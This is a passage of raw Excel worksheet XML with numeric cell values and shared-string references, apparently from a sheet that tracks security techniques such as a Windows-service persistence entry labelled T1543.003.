        <v>8</v>
      </c>
      <c r="FE83" s="116">
        <v>4</v>
      </c>
      <c r="FF83" s="101">
        <v>14</v>
      </c>
      <c r="FG83" s="102" t="s">
        <v>3602</v>
      </c>
      <c r="FH83" s="102">
        <v>3</v>
      </c>
      <c r="FI83" s="103" t="s">
        <v>3603</v>
      </c>
      <c r="FJ83" s="103">
        <v>3</v>
      </c>
      <c r="FK83" s="104">
        <v>2</v>
      </c>
      <c r="FL83" s="202">
        <v>0</v>
      </c>
      <c r="FM83" s="203">
        <v>0</v>
      </c>
      <c r="FN83" s="499">
        <v>0</v>
      </c>
      <c r="FO83" s="107">
        <v>0</v>
      </c>
      <c r="FP83" s="107">
        <v>0</v>
      </c>
      <c r="FQ83" s="108">
        <v>0</v>
      </c>
      <c r="FR83" s="109">
        <v>14</v>
      </c>
      <c r="FS83" s="110" t="s">
        <v>3602</v>
      </c>
      <c r="FT83" s="501">
        <v>3</v>
      </c>
      <c r="FU83" s="111" t="s">
        <v>3603</v>
      </c>
      <c r="FV83" s="111">
        <v>3</v>
      </c>
      <c r="FW83" s="112">
        <v>2</v>
      </c>
      <c r="FX83" s="113">
        <v>16</v>
      </c>
      <c r="FY83" s="114" t="s">
        <v>3624</v>
      </c>
      <c r="FZ83" s="503">
        <v>5</v>
      </c>
      <c r="GA83" s="115" t="s">
        <v>3625</v>
      </c>
      <c r="GB83" s="115">
        <v>4</v>
      </c>
      <c r="GC83" s="116">
        <v>4</v>
      </c>
      <c r="GD83" s="250">
        <v>26</v>
      </c>
      <c r="GE83" s="251" t="s">
        <v>3626</v>
      </c>
      <c r="GF83" s="505">
        <v>10</v>
      </c>
      <c r="GG83" s="252" t="s">
        <v>3627</v>
      </c>
      <c r="GH83" s="252">
        <v>5</v>
      </c>
      <c r="GI83" s="253">
        <v>7</v>
      </c>
      <c r="GJ83" s="101">
        <v>42</v>
      </c>
      <c r="GK83" s="102" t="s">
        <v>3628</v>
      </c>
      <c r="GL83" s="102">
        <v>15</v>
      </c>
      <c r="GM83" s="103" t="s">
        <v>3629</v>
      </c>
      <c r="GN83" s="103">
        <v>9</v>
      </c>
      <c r="GO83" s="104">
        <v>7</v>
      </c>
      <c r="GP83" s="202">
        <v>0</v>
      </c>
      <c r="GQ83" s="203">
        <v>0</v>
      </c>
      <c r="GR83" s="499">
        <v>0</v>
      </c>
      <c r="GS83" s="107">
        <v>0</v>
      </c>
      <c r="GT83" s="107">
        <v>0</v>
      </c>
      <c r="GU83" s="108">
        <v>0</v>
      </c>
      <c r="GV83" s="109">
        <v>2</v>
      </c>
      <c r="GW83" s="110" t="s">
        <v>3630</v>
      </c>
      <c r="GX83" s="501">
        <v>2</v>
      </c>
      <c r="GY83" s="111" t="s">
        <v>3631</v>
      </c>
      <c r="GZ83" s="111">
        <v>1</v>
      </c>
      <c r="HA83" s="112">
        <v>2</v>
      </c>
      <c r="HB83" s="113">
        <v>16</v>
      </c>
      <c r="HC83" s="114" t="s">
        <v>3632</v>
      </c>
      <c r="HD83" s="503">
        <v>5</v>
      </c>
      <c r="HE83" s="115" t="s">
        <v>3633</v>
      </c>
      <c r="HF83" s="115">
        <v>4</v>
      </c>
      <c r="HG83" s="116">
        <v>4</v>
      </c>
      <c r="HH83" s="101">
        <v>0</v>
      </c>
      <c r="HI83" s="102">
        <v>0</v>
      </c>
      <c r="HJ83" s="102">
        <v>0</v>
      </c>
      <c r="HK83" s="103">
        <v>0</v>
      </c>
      <c r="HL83" s="103">
        <v>0</v>
      </c>
      <c r="HM83" s="104">
        <v>0</v>
      </c>
      <c r="HN83" s="202">
        <v>0</v>
      </c>
      <c r="HO83" s="203">
        <v>0</v>
      </c>
      <c r="HP83" s="499">
        <v>0</v>
      </c>
      <c r="HQ83" s="107">
        <v>0</v>
      </c>
      <c r="HR83" s="107">
        <v>0</v>
      </c>
      <c r="HS83" s="108">
        <v>0</v>
      </c>
      <c r="HT83" s="109">
        <v>0</v>
      </c>
      <c r="HU83" s="110">
        <v>0</v>
      </c>
      <c r="HV83" s="501">
        <v>0</v>
      </c>
      <c r="HW83" s="111">
        <v>0</v>
      </c>
      <c r="HX83" s="111">
        <v>0</v>
      </c>
      <c r="HY83" s="112">
        <v>0</v>
      </c>
      <c r="HZ83" s="113">
        <v>2</v>
      </c>
      <c r="IA83" s="114" t="s">
        <v>3634</v>
      </c>
      <c r="IB83" s="503">
        <v>1</v>
      </c>
      <c r="IC83" s="115" t="s">
        <v>3635</v>
      </c>
      <c r="ID83" s="115">
        <v>1</v>
      </c>
      <c r="IE83" s="116">
        <v>1</v>
      </c>
      <c r="IF83" s="250">
        <v>0</v>
      </c>
      <c r="IG83" s="251">
        <v>0</v>
      </c>
      <c r="IH83" s="505">
        <v>0</v>
      </c>
      <c r="II83" s="252">
        <v>0</v>
      </c>
      <c r="IJ83" s="252">
        <v>0</v>
      </c>
      <c r="IK83" s="253">
        <v>0</v>
      </c>
      <c r="IL83" s="101">
        <v>2</v>
      </c>
      <c r="IM83" s="102" t="s">
        <v>3634</v>
      </c>
      <c r="IN83" s="102">
        <v>1</v>
      </c>
      <c r="IO83" s="103" t="s">
        <v>3635</v>
      </c>
      <c r="IP83" s="103">
        <v>1</v>
      </c>
      <c r="IQ83" s="104">
        <v>1</v>
      </c>
      <c r="IR83" s="202">
        <v>0</v>
      </c>
      <c r="IS83" s="203">
        <v>0</v>
      </c>
      <c r="IT83" s="499">
        <v>0</v>
      </c>
      <c r="IU83" s="107">
        <v>0</v>
      </c>
      <c r="IV83" s="107">
        <v>0</v>
      </c>
      <c r="IW83" s="108">
        <v>0</v>
      </c>
      <c r="IX83" s="109">
        <v>0</v>
      </c>
      <c r="IY83" s="110">
        <v>0</v>
      </c>
      <c r="IZ83" s="501">
        <v>0</v>
      </c>
      <c r="JA83" s="111">
        <v>0</v>
      </c>
      <c r="JB83" s="111">
        <v>0</v>
      </c>
      <c r="JC83" s="112">
        <v>0</v>
      </c>
      <c r="JD83" s="113">
        <v>0</v>
      </c>
      <c r="JE83" s="114">
        <v>0</v>
      </c>
      <c r="JF83" s="503">
        <v>0</v>
      </c>
      <c r="JG83" s="115">
        <v>0</v>
      </c>
      <c r="JH83" s="115">
        <v>0</v>
      </c>
      <c r="JI83" s="116">
        <v>0</v>
      </c>
      <c r="JJ83" s="101">
        <v>0</v>
      </c>
      <c r="JK83" s="102">
        <v>0</v>
      </c>
      <c r="JL83" s="102">
        <v>0</v>
      </c>
      <c r="JM83" s="103">
        <v>0</v>
      </c>
      <c r="JN83" s="103">
        <v>0</v>
      </c>
      <c r="JO83" s="104">
        <v>0</v>
      </c>
      <c r="JP83" s="202">
        <v>0</v>
      </c>
      <c r="JQ83" s="203">
        <v>0</v>
      </c>
      <c r="JR83" s="499">
        <v>0</v>
      </c>
      <c r="JS83" s="107">
        <v>0</v>
      </c>
      <c r="JT83" s="107">
        <v>0</v>
      </c>
      <c r="JU83" s="108">
        <v>0</v>
      </c>
      <c r="JV83" s="109">
        <v>0</v>
      </c>
      <c r="JW83" s="110">
        <v>0</v>
      </c>
      <c r="JX83" s="501">
        <v>0</v>
      </c>
      <c r="JY83" s="111">
        <v>0</v>
      </c>
      <c r="JZ83" s="111">
        <v>0</v>
      </c>
      <c r="KA83" s="112">
        <v>0</v>
      </c>
      <c r="KB83" s="113">
        <v>0</v>
      </c>
      <c r="KC83" s="114">
        <v>0</v>
      </c>
      <c r="KD83" s="503">
        <v>0</v>
      </c>
      <c r="KE83" s="115">
        <v>0</v>
      </c>
      <c r="KF83" s="115">
        <v>0</v>
      </c>
      <c r="KG83" s="116">
        <v>0</v>
      </c>
      <c r="KH83" s="250">
        <v>0</v>
      </c>
      <c r="KI83" s="251">
        <v>0</v>
      </c>
      <c r="KJ83" s="505">
        <v>0</v>
      </c>
      <c r="KK83" s="252">
        <v>0</v>
      </c>
      <c r="KL83" s="252">
        <v>0</v>
      </c>
      <c r="KM83" s="253">
        <v>0</v>
      </c>
      <c r="KN83" s="101">
        <v>0</v>
      </c>
      <c r="KO83" s="102">
        <v>0</v>
      </c>
      <c r="KP83" s="102">
        <v>0</v>
      </c>
      <c r="KQ83" s="103">
        <v>0</v>
      </c>
      <c r="KR83" s="103">
        <v>0</v>
      </c>
      <c r="KS83" s="104">
        <v>0</v>
      </c>
      <c r="KT83" s="202">
        <v>0</v>
      </c>
      <c r="KU83" s="203">
        <v>0</v>
      </c>
      <c r="KV83" s="499">
        <v>0</v>
      </c>
      <c r="KW83" s="107">
        <v>0</v>
      </c>
      <c r="KX83" s="107">
        <v>0</v>
      </c>
      <c r="KY83" s="108">
        <v>0</v>
      </c>
      <c r="KZ83" s="109">
        <v>0</v>
      </c>
      <c r="LA83" s="110">
        <v>0</v>
      </c>
      <c r="LB83" s="501">
        <v>0</v>
      </c>
      <c r="LC83" s="111">
        <v>0</v>
      </c>
      <c r="LD83" s="111">
        <v>0</v>
      </c>
      <c r="LE83" s="112">
        <v>0</v>
      </c>
      <c r="LF83" s="113">
        <v>0</v>
      </c>
      <c r="LG83" s="114">
        <v>0</v>
      </c>
      <c r="LH83" s="503">
        <v>0</v>
      </c>
      <c r="LI83" s="115">
        <v>0</v>
      </c>
      <c r="LJ83" s="115">
        <v>0</v>
      </c>
      <c r="LK83" s="116">
        <v>0</v>
      </c>
      <c r="LL83" s="117">
        <v>8</v>
      </c>
      <c r="LM83" s="507">
        <v>7</v>
      </c>
      <c r="LN83" s="119">
        <v>1</v>
      </c>
      <c r="LO83" s="119">
        <v>4</v>
      </c>
      <c r="LP83" s="119">
        <v>5</v>
      </c>
      <c r="LQ83" s="119">
        <v>2</v>
      </c>
      <c r="LR83" s="119">
        <v>4</v>
      </c>
      <c r="LS83" s="119">
        <v>5</v>
      </c>
      <c r="LT83" s="382"/>
      <c r="LU83" s="117">
        <v>0</v>
      </c>
      <c r="LV83" s="118">
        <v>0</v>
      </c>
      <c r="LW83" s="507">
        <v>0</v>
      </c>
      <c r="LX83" s="119">
        <v>0</v>
      </c>
      <c r="LY83" s="119">
        <v>0</v>
      </c>
      <c r="LZ83" s="119">
        <v>0</v>
      </c>
      <c r="MA83" s="117">
        <v>0</v>
      </c>
      <c r="MB83" s="118">
        <v>0</v>
      </c>
      <c r="MC83" s="507">
        <v>0</v>
      </c>
      <c r="MD83" s="119">
        <v>0</v>
      </c>
      <c r="ME83" s="119">
        <v>0</v>
      </c>
      <c r="MF83" s="119">
        <v>0</v>
      </c>
      <c r="MG83" s="117">
        <v>0</v>
      </c>
      <c r="MH83" s="118">
        <v>0</v>
      </c>
      <c r="MI83" s="507">
        <v>0</v>
      </c>
      <c r="MJ83" s="119">
        <v>0</v>
      </c>
      <c r="MK83" s="119">
        <v>0</v>
      </c>
      <c r="ML83" s="119">
        <v>0</v>
      </c>
      <c r="MM83" s="117">
        <v>0</v>
      </c>
      <c r="MN83" s="118">
        <v>0</v>
      </c>
      <c r="MO83" s="507">
        <v>0</v>
      </c>
      <c r="MP83" s="119">
        <v>0</v>
      </c>
      <c r="MQ83" s="119">
        <v>0</v>
      </c>
      <c r="MR83" s="119">
        <v>0</v>
      </c>
      <c r="MS83" s="117">
        <v>3</v>
      </c>
      <c r="MT83" s="118" t="s">
        <v>4233</v>
      </c>
      <c r="MU83" s="507">
        <v>2</v>
      </c>
      <c r="MV83" s="119" t="s">
        <v>2789</v>
      </c>
      <c r="MW83" s="119">
        <v>1</v>
      </c>
      <c r="MX83" s="119">
        <v>2</v>
      </c>
      <c r="MY83" s="117">
        <v>0</v>
      </c>
      <c r="MZ83" s="118">
        <v>0</v>
      </c>
      <c r="NA83" s="507">
        <v>0</v>
      </c>
      <c r="NB83" s="119">
        <v>0</v>
      </c>
      <c r="NC83" s="119">
        <v>0</v>
      </c>
      <c r="ND83" s="119">
        <v>0</v>
      </c>
      <c r="NE83" s="117">
        <v>0</v>
      </c>
      <c r="NF83" s="118">
        <v>0</v>
      </c>
      <c r="NG83" s="507">
        <v>0</v>
      </c>
      <c r="NH83" s="119">
        <v>0</v>
      </c>
      <c r="NI83" s="119">
        <v>0</v>
      </c>
      <c r="NJ83" s="119">
        <v>0</v>
      </c>
      <c r="NK83" s="117">
        <v>2</v>
      </c>
      <c r="NL83" s="118" t="s">
        <v>4191</v>
      </c>
      <c r="NM83" s="507">
        <v>2</v>
      </c>
      <c r="NN83" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO83" s="119">
        <v>1</v>
      </c>
      <c r="NP83" s="119">
        <v>2</v>
      </c>
      <c r="NQ83" s="117">
        <v>0</v>
      </c>
      <c r="NR83" s="118">
        <v>0</v>
      </c>
      <c r="NS83" s="507">
        <v>0</v>
      </c>
      <c r="NT83" s="119">
        <v>0</v>
      </c>
      <c r="NU83" s="119">
        <v>0</v>
      </c>
      <c r="NV83" s="119">
        <v>0</v>
      </c>
      <c r="NW83" s="117">
        <v>3</v>
      </c>
      <c r="NX83" s="118" t="s">
        <v>4402</v>
      </c>
      <c r="NY83" s="507">
        <v>3</v>
      </c>
      <c r="NZ83" s="119" t="s">
        <v>4403</v>
      </c>
      <c r="OA83" s="119">
        <v>3</v>
      </c>
      <c r="OB83" s="119">
        <v>3</v>
      </c>
      <c r="OC83" s="120">
        <v>2</v>
      </c>
      <c r="OD83" s="120">
        <v>2</v>
      </c>
      <c r="OE83" s="120">
        <v>1</v>
      </c>
      <c r="OF83" s="121">
        <v>1</v>
      </c>
      <c r="OG83" s="120">
        <v>2</v>
      </c>
      <c r="OH83" s="120">
        <v>2</v>
      </c>
      <c r="OI83" s="120">
        <v>2</v>
      </c>
      <c r="OJ83" s="120">
        <v>2</v>
      </c>
      <c r="OK83" s="383"/>
      <c r="OL83" s="120">
        <v>2</v>
      </c>
      <c r="OM83" s="120">
        <v>2</v>
      </c>
      <c r="ON83" s="120">
        <v>2</v>
      </c>
      <c r="OO83" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP83" s="120">
        <v>1</v>
      </c>
      <c r="OQ83" s="464">
        <v>2</v>
      </c>
      <c r="OR83" s="120">
        <v>0</v>
      </c>
      <c r="OS83" s="120">
        <v>0</v>
      </c>
      <c r="OT83" s="120">
        <v>0</v>
      </c>
      <c r="OU83" s="120"/>
      <c r="OV83" s="120">
        <v>0</v>
      </c>
      <c r="OW83" s="464">
        <v>0</v>
      </c>
      <c r="OX83" s="120">
        <v>0</v>
      </c>
      <c r="OY83" s="120">
        <v>0</v>
      </c>
      <c r="OZ83" s="120">
        <v>0</v>
      </c>
      <c r="PA83" s="120"/>
      <c r="PB83" s="120">
        <v>0</v>
      </c>
      <c r="PC83" s="464">
        <v>0</v>
      </c>
      <c r="PD83" s="120">
        <v>0</v>
      </c>
      <c r="PE83" s="120">
        <v>0</v>
      </c>
      <c r="PF83" s="120">
        <v>0</v>
      </c>
      <c r="PG83" s="120"/>
      <c r="PH83" s="120">
        <v>0</v>
      </c>
      <c r="PI83" s="464">
        <v>0</v>
      </c>
      <c r="PJ83" s="120">
        <v>0</v>
      </c>
      <c r="PK83" s="120">
        <v>0</v>
      </c>
      <c r="PL83" s="120">
        <v>0</v>
      </c>
      <c r="PM83" s="120"/>
      <c r="PN83" s="120">
        <v>0</v>
      </c>
      <c r="PO83" s="464">
        <v>0</v>
      </c>
      <c r="PP83" s="120">
        <v>0</v>
      </c>
      <c r="PQ83" s="120">
        <v>0</v>
      </c>
      <c r="PR83" s="120">
        <v>0</v>
      </c>
      <c r="PS83" s="120"/>
      <c r="PT83" s="120">
        <v>0</v>
      </c>
      <c r="PU83" s="464">
        <v>0</v>
      </c>
      <c r="PV83" s="120">
        <v>0</v>
      </c>
      <c r="PW83" s="120">
        <v>0</v>
      </c>
      <c r="PX83" s="120">
        <v>0</v>
      </c>
      <c r="PY83" s="120"/>
      <c r="PZ83" s="120">
        <v>0</v>
      </c>
      <c r="QA83" s="464">
        <v>0</v>
      </c>
      <c r="QB83" s="120">
        <v>0</v>
      </c>
      <c r="QC83" s="120">
        <v>0</v>
      </c>
      <c r="QD83" s="120">
        <v>0</v>
      </c>
      <c r="QE83" s="120"/>
      <c r="QF83" s="120">
        <v>0</v>
      </c>
      <c r="QG83" s="464">
        <v>0</v>
      </c>
      <c r="QH83" s="120">
        <v>2</v>
      </c>
      <c r="QI83" s="120">
        <v>2</v>
      </c>
      <c r="QJ83" s="120">
        <v>2</v>
      </c>
      <c r="QK83" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL83" s="120">
        <v>1</v>
      </c>
      <c r="QM83" s="464">
        <v>2</v>
      </c>
      <c r="QN83" s="120">
        <v>0</v>
      </c>
      <c r="QO83" s="120">
        <v>0</v>
      </c>
      <c r="QP83" s="120">
        <v>0</v>
      </c>
      <c r="QQ83" s="120"/>
      <c r="QR83" s="120">
        <v>0</v>
      </c>
      <c r="QS83" s="464">
        <v>0</v>
      </c>
      <c r="QT83" s="184"/>
      <c r="QU83" s="184"/>
      <c r="QV83" s="184"/>
      <c r="QW83" s="184"/>
      <c r="QX83" s="184"/>
      <c r="QY83" s="184"/>
      <c r="QZ83" s="184"/>
      <c r="RA83" s="184"/>
      <c r="RB83" s="184"/>
      <c r="RC83" s="184"/>
      <c r="RD83" s="184"/>
      <c r="RE83" s="184"/>
      <c r="RF83" s="184"/>
      <c r="RG83" s="184"/>
      <c r="RH83" s="184"/>
      <c r="RI83" s="184"/>
      <c r="RJ83" s="184"/>
      <c r="RK83" s="184"/>
      <c r="RL83" s="184"/>
      <c r="RM83" s="184"/>
      <c r="RN83" s="184"/>
      <c r="RO83" s="184"/>
      <c r="RP83" s="184"/>
      <c r="RQ83" s="184"/>
      <c r="RR83" s="184"/>
      <c r="RS83" s="184"/>
      <c r="RT83" s="184"/>
      <c r="RU83" s="184"/>
      <c r="RV83" s="184"/>
      <c r="RW83" s="184"/>
      <c r="RX83" s="184"/>
      <c r="RY83" s="184"/>
      <c r="RZ83" s="184"/>
      <c r="SA83" s="184"/>
      <c r="SB83" s="184"/>
      <c r="SC83" s="184"/>
      <c r="SD83" s="184"/>
      <c r="SE83" s="184"/>
      <c r="SF83" s="184"/>
      <c r="SG83" s="184"/>
      <c r="SH83" s="184"/>
      <c r="SI83" s="184"/>
      <c r="SJ83" s="184"/>
      <c r="SK83" s="184"/>
      <c r="SL83" s="184"/>
      <c r="SM83" s="184"/>
      <c r="SN83" s="184"/>
      <c r="SO83" s="184"/>
      <c r="SP83" s="184"/>
      <c r="SQ83" s="184"/>
      <c r="SR83" s="184"/>
      <c r="SS83" s="184"/>
      <c r="ST83" s="184"/>
      <c r="SU83" s="184"/>
      <c r="SV83" s="184"/>
      <c r="SW83" s="184"/>
      <c r="SX83" s="184"/>
      <c r="SY83" s="184"/>
      <c r="SZ83" s="184"/>
      <c r="TA83" s="184"/>
      <c r="TB83" s="184"/>
      <c r="TC83" s="184"/>
      <c r="TD83" s="184"/>
      <c r="TE83" s="184"/>
      <c r="TF83" s="184"/>
      <c r="TG83" s="184"/>
      <c r="TH83" s="184"/>
      <c r="TI83" s="184"/>
      <c r="TJ83" s="184"/>
      <c r="TK83" s="184"/>
      <c r="TL83" s="184"/>
      <c r="TM83" s="184"/>
      <c r="TN83" s="184"/>
      <c r="TO83" s="184"/>
      <c r="TP83" s="184"/>
      <c r="TQ83" s="184"/>
      <c r="TR83" s="184"/>
      <c r="TS83" s="184"/>
      <c r="TT83" s="184"/>
      <c r="TU83" s="184"/>
      <c r="TV83" s="184"/>
      <c r="TW83" s="184"/>
      <c r="TX83" s="184"/>
      <c r="TY83" s="184"/>
      <c r="TZ83" s="184"/>
      <c r="UA83" s="184"/>
      <c r="UB83" s="184"/>
      <c r="UC83" s="184"/>
      <c r="UD83" s="184"/>
      <c r="UE83" s="184"/>
      <c r="UF83" s="184"/>
      <c r="UG83" s="184"/>
      <c r="UH83" s="184"/>
      <c r="UI83" s="184"/>
      <c r="UJ83" s="184"/>
      <c r="UK83" s="184"/>
      <c r="UL83" s="184"/>
      <c r="UM83" s="184"/>
      <c r="UN83" s="184"/>
      <c r="UO83" s="184"/>
      <c r="UP83" s="184"/>
      <c r="UQ83" s="184"/>
      <c r="UR83" s="184"/>
      <c r="US83" s="184"/>
      <c r="UT83" s="184"/>
      <c r="UU83" s="184"/>
      <c r="UV83" s="184"/>
      <c r="UW83" s="184"/>
      <c r="UX83" s="184"/>
      <c r="UY83" s="184"/>
      <c r="UZ83" s="184"/>
      <c r="VA83" s="184"/>
      <c r="VB83" s="184"/>
      <c r="VC83" s="184"/>
      <c r="VD83" s="184"/>
      <c r="VE83" s="184"/>
      <c r="VF83" s="184"/>
      <c r="VG83" s="184"/>
      <c r="VH83" s="184"/>
      <c r="VI83" s="184"/>
      <c r="VJ83" s="184"/>
      <c r="VK83" s="184"/>
      <c r="VL83" s="184"/>
      <c r="VM83" s="184"/>
      <c r="VN83" s="184"/>
      <c r="VO83" s="184"/>
      <c r="VP83" s="184"/>
      <c r="VQ83" s="184"/>
      <c r="VR83" s="184"/>
      <c r="VS83" s="184"/>
      <c r="VT83" s="184"/>
      <c r="VU83" s="184"/>
      <c r="VV83" s="184"/>
      <c r="VW83" s="184"/>
      <c r="VX83" s="184"/>
      <c r="VY83" s="184"/>
    </row>
    <row r="84" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A84" s="82" t="s">
        <v>44</v>
      </c>
      <c r="B84" s="83" t="s">
        <v>367</v>
      </c>
      <c r="C84" s="83" t="s">
        <v>428</v>
      </c>
      <c r="D84" s="83" t="s">
        <v>123</v>
      </c>
      <c r="E84" s="83">
        <f t="shared" si="5"/>
        <v>53</v>
      </c>
      <c r="F84" s="83" t="s">
        <v>124</v>
      </c>
      <c r="G84" s="83" t="s">
        <v>1468</v>
      </c>
      <c r="H84" s="83" t="s">
        <v>1469</v>
      </c>
      <c r="I84" s="81" t="s">
        <v>1470</v>
      </c>
      <c r="J84" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K84" s="81" t="s">
        <v>901</v>
      </c>
      <c r="L84" s="81" t="s">
        <v>1471</v>
      </c>
      <c r="M84" s="378" t="s">
        <v>245</v>
      </c>
      <c r="N84" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O84" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P84" s="91"/>
      <c r="Q84" s="379" t="s">
        <v>841</v>
      </c>
      <c r="R84" s="92" t="s">
        <v>1472</v>
      </c>
      <c r="S84" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T84" s="92" t="s">
        <v>1473</v>
      </c>
      <c r="U84" s="94" t="s">
        <v>1474</v>
      </c>
      <c r="V84" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W84" s="96" t="s">
        <v>1475</v>
      </c>
      <c r="X84" s="97" t="s">
        <v>1476</v>
      </c>
      <c r="Y84" s="83" t="s">
        <v>1477</v>
      </c>
      <c r="Z84" s="98" t="s">
        <v>1478</v>
      </c>
      <c r="AA84" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB84" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC84" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD84" s="83"/>
      <c r="AE84" s="83"/>
      <c r="AF84" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG84" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH84" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI84" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ84" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK84" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL84" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM84" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN84" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO84" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP84" s="385" t="str">
        <f>M84&amp;"-frag"</f>
        <v>T1543.003-CreateSystemProcessWindowsService-frag</v>
      </c>
      <c r="AQ84" s="358">
        <v>3</v>
      </c>
      <c r="AR84" s="100"/>
      <c r="AS84" s="100">
        <v>1</v>
      </c>
      <c r="AT84" s="100">
        <v>1</v>
      </c>
      <c r="AU84" s="100">
        <v>2</v>
      </c>
      <c r="AV84" s="92" t="s">
        <v>910</v>
      </c>
      <c r="AW84" s="100">
        <v>1</v>
      </c>
      <c r="AX84" s="100">
        <v>1</v>
      </c>
      <c r="AY84" s="100">
        <v>2</v>
      </c>
      <c r="AZ84" s="100">
        <v>3</v>
      </c>
      <c r="BA84" s="381" t="s">
        <v>4901</v>
      </c>
      <c r="BB84" s="101">
        <v>16</v>
      </c>
      <c r="BC84" s="102" t="s">
        <v>3636</v>
      </c>
      <c r="BD84" s="102">
        <v>6</v>
      </c>
      <c r="BE84" s="103" t="s">
        <v>3637</v>
      </c>
      <c r="BF84" s="103">
        <v>3</v>
      </c>
      <c r="BG84" s="104">
        <v>2</v>
      </c>
      <c r="BH84" s="105">
        <v>8</v>
      </c>
      <c r="BI84" s="106" t="s">
        <v>3638</v>
      </c>
      <c r="BJ84" s="497">
        <v>6</v>
      </c>
      <c r="BK84" s="107" t="s">
        <v>3639</v>
      </c>
      <c r="BL84" s="107">
        <v>3</v>
      </c>
      <c r="BM84" s="108">
        <v>2</v>
      </c>
      <c r="BN84" s="109">
        <v>24</v>
      </c>
      <c r="BO84" s="110" t="s">
        <v>2043</v>
      </c>
      <c r="BP84" s="501">
        <v>12</v>
      </c>
      <c r="BQ84" s="111" t="s">
        <v>2044</v>
      </c>
      <c r="BR84" s="111">
        <v>6</v>
      </c>
      <c r="BS84" s="112">
        <v>2</v>
      </c>
      <c r="BT84" s="113">
        <v>23</v>
      </c>
      <c r="BU84" s="114" t="s">
        <v>3640</v>
      </c>
      <c r="BV84" s="503">
        <v>11</v>
      </c>
      <c r="BW84" s="115" t="s">
        <v>3641</v>
      </c>
      <c r="BX84" s="115">
        <v>6</v>
      </c>
      <c r="BY84" s="116">
        <v>3</v>
      </c>
      <c r="BZ84" s="250">
        <v>16</v>
      </c>
      <c r="CA84" s="251" t="s">
        <v>3642</v>
      </c>
      <c r="CB84" s="505">
        <v>10</v>
      </c>
      <c r="CC84" s="252" t="s">
        <v>3643</v>
      </c>
      <c r="CD84" s="252">
        <v>6</v>
      </c>
      <c r="CE84" s="253">
        <v>2</v>
      </c>
      <c r="CF84" s="101">
        <v>39</v>
      </c>
      <c r="CG84" s="102" t="s">
        <v>3644</v>
      </c>
      <c r="CH84" s="102">
        <v>21</v>
      </c>
      <c r="CI84" s="103" t="s">
        <v>3645</v>
      </c>
      <c r="CJ84" s="103">
        <v>12</v>
      </c>
      <c r="CK84" s="104">
        <v>3</v>
      </c>
      <c r="CL84" s="105">
        <v>0</v>
      </c>
      <c r="CM84" s="106">
        <v>0</v>
      </c>
      <c r="CN84" s="497">
        <v>0</v>
      </c>
      <c r="CO84" s="107">
        <v>0</v>
      </c>
      <c r="CP84" s="107">
        <v>0</v>
      </c>
      <c r="CQ84" s="108">
        <v>0</v>
      </c>
      <c r="CR84" s="109">
        <v>0</v>
      </c>
      <c r="CS84" s="110">
        <v>0</v>
      </c>
      <c r="CT84" s="501">
        <v>0</v>
      </c>
      <c r="CU84" s="111">
        <v>0</v>
      </c>
      <c r="CV84" s="111">
        <v>0</v>
      </c>
      <c r="CW84" s="112">
        <v>0</v>
      </c>
      <c r="CX84" s="113">
        <v>24</v>
      </c>
      <c r="CY84" s="114" t="s">
        <v>2043</v>
      </c>
      <c r="CZ84" s="503">
        <v>12</v>
      </c>
      <c r="DA84" s="115" t="s">
        <v>2044</v>
      </c>
      <c r="DB84" s="115">
        <v>6</v>
      </c>
      <c r="DC84" s="116">
        <v>2</v>
      </c>
      <c r="DD84" s="101">
        <v>0</v>
      </c>
      <c r="DE84" s="102">
        <v>0</v>
      </c>
      <c r="DF84" s="102">
        <v>0</v>
      </c>
      <c r="DG84" s="103">
        <v>0</v>
      </c>
      <c r="DH84" s="103">
        <v>0</v>
      </c>
      <c r="DI84" s="104">
        <v>0</v>
      </c>
      <c r="DJ84" s="105">
        <v>4</v>
      </c>
      <c r="DK84" s="106" t="s">
        <v>3646</v>
      </c>
      <c r="DL84" s="497">
        <v>4</v>
      </c>
      <c r="DM84" s="107" t="s">
        <v>3179</v>
      </c>
      <c r="DN84" s="107">
        <v>2</v>
      </c>
      <c r="DO84" s="108">
        <v>2</v>
      </c>
      <c r="DP84" s="109">
        <v>4</v>
      </c>
      <c r="DQ84" s="110" t="s">
        <v>3646</v>
      </c>
      <c r="DR84" s="501">
        <v>4</v>
      </c>
      <c r="DS84" s="111" t="s">
        <v>3179</v>
      </c>
      <c r="DT84" s="111">
        <v>2</v>
      </c>
      <c r="DU84" s="112">
        <v>2</v>
      </c>
      <c r="DV84" s="113">
        <v>7</v>
      </c>
      <c r="DW84" s="114" t="s">
        <v>3647</v>
      </c>
      <c r="DX84" s="503">
        <v>5</v>
      </c>
      <c r="DY84" s="115" t="s">
        <v>3648</v>
      </c>
      <c r="DZ84" s="115">
        <v>3</v>
      </c>
      <c r="EA84" s="116">
        <v>3</v>
      </c>
      <c r="EB84" s="250">
        <v>8</v>
      </c>
      <c r="EC84" s="251" t="s">
        <v>3649</v>
      </c>
      <c r="ED84" s="505">
        <v>6</v>
      </c>
      <c r="EE84" s="252" t="s">
        <v>3650</v>
      </c>
      <c r="EF84" s="252">
        <v>3</v>
      </c>
      <c r="EG84" s="253">
        <v>2</v>
      </c>
      <c r="EH84" s="101">
        <v>15</v>
      </c>
      <c r="EI84" s="102" t="s">
        <v>3651</v>
      </c>
      <c r="EJ84" s="102">
        <v>11</v>
      </c>
      <c r="EK84" s="103" t="s">
        <v>3652</v>
      </c>
      <c r="EL84" s="103">
